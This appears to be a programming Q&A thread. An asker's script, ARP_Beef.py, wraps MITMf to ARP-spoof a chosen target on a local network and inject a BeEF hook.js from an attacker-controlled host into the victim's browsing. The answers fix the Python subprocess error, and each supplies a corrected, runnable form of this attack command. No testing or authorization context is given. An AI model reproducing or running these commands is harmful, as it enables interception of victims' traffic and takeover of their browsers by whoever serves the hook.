# unable to run subprocess cmd keep getting error

Tags: python, shell, subprocess

My code is:

```
#! /usr/bin/env python
ip_addr = raw_input("Enter your target IP: ")
gateway = raw_input("Enter your gateway IP: ")

from subprocess import call
import subprocess

import os
os.chdir("/usr/share/mitmf/")

subprocess.Popen(["python mitmf.py --spoof --arp -i wlan0 --gateway %s --target %s --inject --js-url http://192.168.1.109:3000/hook.js"] % (gateway, ip_addr), shell = False)
```

and my out put is:

```
Traceback (most recent call last):                                    
File "./ARP_Beef.py", line 11, in <module>
    subprocess.Popen(["python mitmf.py --spoof --arp -i wlan0 --gateway %s --target %s --inject --js-url http://192.168.1.109:3000/hook.js"] % (gateway, ip_addr), shell = False)
TypeError: unsupported operand type(s) for %: 'list' and 'tuple'
```

I can't figure out what is wrong. Can some one help me

Answer (score 0, accepted):

I would say: do it with single list-elements:

```
subprocess.Popen(["python", "mitmf.py", "--spoof", "--arp", "-i", "wlan0", "--gateway", gateway, "--target", ip_addr, "--inject", "--js-url", "http://192.168.1.109:3000/hook.js"], shell = False)
```

docs.python.org: "On Unix, if args is a string, the string is interpreted as the name or path of the program to execute. However, this can only be done **if not passing arguments** to the program."

Comment: This looks like it will work, but doesn't explain the cause of the asker's error.

Answer (score 0):

Remove `'['` and `']'`

```
"python mitmf.py --spoof --arp -i wlan0 --gateway %s --target %s --inject --js-url http://192.168.1.109:3000/hook.js" % (gateway, ip_addr)
```

Answer (score 0):

> TypeError: unsupported operand type(s) for %: 'list' and 'tuple'

It means that you can't do:

```
>>> ['%s'] % ('b',)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: unsupported operand type(s) for %: 'list' and 'tuple'
```

You should pass each command-line argument as a separate list item instead:

```
#!/usr/bin/env python
import subprocess
import sys

gateway, ip_addr = 'get them', 'however you like'
subprocess.check_call([sys.executable] + 
    '/usr/share/mitmf/mitmf.py --spoof --arp -i wlan0'.split() +
    ['--gateway', gateway, '--target', ip_addr] +
    '--inject --js-url http://192.168.1.109:3000/hook.js'.split(),
                      cwd="/usr/share/mitmf/")
```